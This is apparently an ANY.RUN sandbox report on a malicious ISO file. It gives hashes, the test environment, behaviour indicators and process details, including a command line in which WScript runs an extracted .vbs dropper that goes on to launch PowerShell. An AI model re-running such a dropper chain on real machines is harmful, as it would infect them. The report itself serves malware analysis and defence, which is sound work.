General Info

File name

QPRCK498428.iso.ISO

Full analysis
https://app.any.run/tasks/10fc5bdc-3dcf-4247-8208-2fe9230cc385
Verdict
Malicious activity
Analysis date
14/01/2022, 22:52:25
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:

MIME:
application/x-iso9660-image
File info:
ISO 9660 CD-ROM filesystem data 'Mail'
MD5

a76936e525e8b8604c604f115302cf84

SHA1

a0a3c6082f24ceae7a264bab036f55c9f4ca1c41

SHA256

9b74c6b8852ca72f3642dfd51d3a556dffedec26cf31af69cf2cb1ab0a39e64d

SSDEEP

192:lAU/iKTvYyfK4DCqOKGf95k8XGQY6frGdjycHFeR75Eo:BTTYqKBFK8k8lrDcycleR75P

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
240 seconds
Additional time used
180 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.0.9600.19596 KB4534251
  • Adobe Acrobat Reader DC (20.013.20064)
  • Adobe Flash Player 32 ActiveX (32.0.0.453)
  • Adobe Flash Player 32 NPAPI (32.0.0.453)
  • Adobe Flash Player 32 PPAPI (32.0.0.453)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.74)
  • FileZilla Client 3.51.0 (3.51.0)
  • Google Chrome (86.0.4240.198)
  • Google Update Helper (1.3.36.31)
  • Java 8 Update 271 (8.0.2710.9)
  • Java Auto Updater (2.8.271.9)
  • Microsoft .NET Framework 4.5.2 (4.5.51209)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
  • Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 83.0 (x86 en-US) (83.0)
  • Mozilla Maintenance Service (83.0.0.7621)
  • Notepad++ (32-bit x86) (7.9.1)
  • Opera 12.15 (12.15.1748)
  • QGA (2.14.33)
  • Skype version 8.29 (8.29)
  • VLC media player (3.0.11)
  • WinRAR 5.91 (32-bit) (5.91.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506212
  • KB2506928
  • KB2532531
  • KB2533552
  • KB2533623
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2564958
  • KB2574819
  • KB2579686
  • KB2585542
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2639308
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2660075
  • KB2667402
  • KB2676562
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2731771
  • KB2732059
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813347
  • KB2813430
  • KB2820331
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2857650
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2872035
  • KB2884256
  • KB2891804
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2923545
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2984976
  • KB2984976 SP1
  • KB2985461
  • KB2991963
  • KB2992611
  • KB2999226
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3020388
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3061518
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075226
  • KB3078667
  • KB3080149
  • KB3086255
  • KB3092601
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3102429
  • KB3102810
  • KB3107998
  • KB3108371
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3118401
  • KB3122648
  • KB3123479
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3150513
  • KB3155178
  • KB3156016
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3170735
  • KB3172605
  • KB3179573
  • KB3184143
  • KB3185319
  • KB4019990
  • KB4040980
  • KB4474419
  • KB4490628
  • KB4524752
  • KB4532945
  • KB4536952
  • KB4567409
  • KB958488
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 21 for KB2984976
  • Package 38 for KB2984976
  • Package 45 for KB2984976
  • Package 59 for KB2984976
  • Package 7 for KB2984976
  • Package 76 for KB2984976
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RDP BlueIP Package TopLevel
  • RDP WinIP Package TopLevel
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel
  • WinMan WinIP Package TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
Executes PowerShell scripts
  • cmd.exe (PID: 2292)
  • cmd.exe (PID: 3808)
  • cmd.exe (PID: 2212)
Checks supported languages
  • WScript.exe (PID: 832)
  • WinRAR.exe (PID: 2256)
  • powershell.exe (PID: 3352)
  • WScript.exe (PID: 3220)
  • powershell.exe (PID: 976)
  • WScript.exe (PID: 3232)
  • WScript.exe (PID: 3680)
  • cmd.exe (PID: 2292)
  • powershell.exe (PID: 3456)
  • powershell.exe (PID: 2332)
  • WScript.exe (PID: 3384)
  • cmd.exe (PID: 3808)
  • powershell.exe (PID: 1124)
  • WScript.exe (PID: 1612)
  • WinRAR.exe (PID: 3428)
  • cmd.exe (PID: 2212)
  • WScript.exe (PID: 2960)
  • powershell.exe (PID: 3144)
  • powershell.exe (PID: 3812)
Reads the computer name
  • WScript.exe (PID: 832)
  • WinRAR.exe (PID: 2256)
  • powershell.exe (PID: 3352)
  • WScript.exe (PID: 3220)
  • powershell.exe (PID: 3456)
  • WScript.exe (PID: 3680)
  • WScript.exe (PID: 3232)
  • powershell.exe (PID: 976)
  • powershell.exe (PID: 2332)
  • WScript.exe (PID: 3384)
  • powershell.exe (PID: 1124)
  • WinRAR.exe (PID: 3428)
  • powershell.exe (PID: 3144)
  • WScript.exe (PID: 1612)
  • WScript.exe (PID: 2960)
  • powershell.exe (PID: 3812)
Executes scripts
  • WinRAR.exe (PID: 2256)
  • powershell.exe (PID: 3352)
  • powershell.exe (PID: 976)
  • powershell.exe (PID: 3144)
Executes PowerShell scripts
  • WScript.exe (PID: 832)
  • WScript.exe (PID: 3220)
  • WScript.exe (PID: 3680)
  • WScript.exe (PID: 1612)
Reads default file associations for system extensions
  • WinRAR.exe (PID: 2256)
Reads Environment values
  • powershell.exe (PID: 3352)
  • powershell.exe (PID: 976)
  • powershell.exe (PID: 2332)
  • powershell.exe (PID: 3144)
Starts CMD.EXE for commands execution
  • WScript.exe (PID: 3232)
  • WScript.exe (PID: 3384)
  • WScript.exe (PID: 2960)
Modifies files in Chrome extension folder
  • chrome.exe (PID: 1488)
Checks Windows Trust Settings
  • WScript.exe (PID: 832)
  • powershell.exe (PID: 976)
  • WScript.exe (PID: 3220)
  • powershell.exe (PID: 3352)
  • WScript.exe (PID: 3680)
  • WScript.exe (PID: 3232)
  • powershell.exe (PID: 3456)
  • powershell.exe (PID: 2332)
  • WScript.exe (PID: 3384)
  • powershell.exe (PID: 1124)
  • WScript.exe (PID: 2960)
  • powershell.exe (PID: 3144)
  • WScript.exe (PID: 1612)
  • powershell.exe (PID: 3812)
Reads settings of System Certificates
  • powershell.exe (PID: 3352)
  • powershell.exe (PID: 976)
  • powershell.exe (PID: 3456)
  • powershell.exe (PID: 1124)
  • powershell.exe (PID: 3144)
  • powershell.exe (PID: 3812)
  • chrome.exe (PID: 3552)
Manual execution by user
  • explorer.exe (PID: 2412)
  • WScript.exe (PID: 1612)
  • WinRAR.exe (PID: 3428)
  • chrome.exe (PID: 1488)
Reads the computer name
  • explorer.exe (PID: 2412)
  • chrome.exe (PID: 1488)
  • chrome.exe (PID: 3552)
  • chrome.exe (PID: 3680)
  • chrome.exe (PID: 3812)
  • chrome.exe (PID: 516)
Checks supported languages
  • explorer.exe (PID: 2412)
  • chrome.exe (PID: 1488)
  • chrome.exe (PID: 3812)
  • chrome.exe (PID: 3552)
  • chrome.exe (PID: 2332)
  • chrome.exe (PID: 3372)
  • chrome.exe (PID: 3860)
  • chrome.exe (PID: 1176)
  • chrome.exe (PID: 3728)
  • chrome.exe (PID: 3680)
  • chrome.exe (PID: 516)
  • chrome.exe (PID: 3532)
  • chrome.exe (PID: 2436)
  • chrome.exe (PID: 2376)
  • chrome.exe (PID: 1552)
Application launched itself
  • chrome.exe (PID: 1488)
Reads the hosts file
  • chrome.exe (PID: 3552)
  • chrome.exe (PID: 1488)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.gmc
|   Game Music Creator Music (13.5%)
.abr
|   Adobe PhotoShop Brush (12%)
EXIF
ISO
VolumeName:
Mail
VolumeBlockCount:
28
VolumeBlockSize:
2048
RootDirectoryCreateDate:
2022:01:14 18:47:53+00:00
VolumeCreateDate:
2022:01:14 18:47:53.46+00:00
VolumeModifyDate:
2022:01:14 18:47:53.46+00:00
VolumeEffectiveDate:
2022:01:14 18:47:53.46+00:00
Composite
VolumeSize:
56 kB

Screenshots

Processes

Total processes
81
Monitored processes
34
Malicious processes
6
Suspicious processes
5

Behavior graph

+
start winrar.exe no specs wscript.exe no specs powershell.exe wscript.exe no specs powershell.exe wscript.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe wscript.exe no specs cmd.exe no specs powershell.exe no specs explorer.exe no specs winrar.exe no specs wscript.exe no specs powershell.exe wscript.exe no specs cmd.exe no specs powershell.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2256
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\QPRCK498428.iso.ISO"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.91.0
Modules
Image
c:\windows\system32\ntdll.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\riched20.dll
c:\program files\winrar\winrar.exe
c:\windows\system32\user32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24542_none_5c0717c7a00ddc6d\gdiplus.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sechost.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\imageres.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\mpr.dll
c:\windows\system32\cscui.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\explorerframe.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wscript.exe
c:\windows\system32\winmm.dll
c:\windows\system32\slc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\secur32.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\wshext.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\duser.dll
c:\windows\system32\netutils.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\dui70.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\samcli.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\linkinfo.dll

PID
832
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2256.40856\QPRCK498428.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft � Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\mpr.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\sxs.dll
c:\windows\system32\msisip.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wscript.exe
c:\windows\system32\msvcrt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\user32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
